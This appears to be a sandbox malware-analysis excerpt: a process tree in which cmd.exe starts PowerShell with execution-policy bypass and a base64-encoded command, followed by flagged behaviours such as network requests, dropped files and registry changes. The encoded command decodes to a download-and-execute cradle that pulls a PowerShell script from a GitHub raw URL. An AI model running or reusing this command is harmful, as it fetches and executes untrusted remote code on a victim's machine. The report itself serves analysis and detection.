C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:3732
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2840
-
-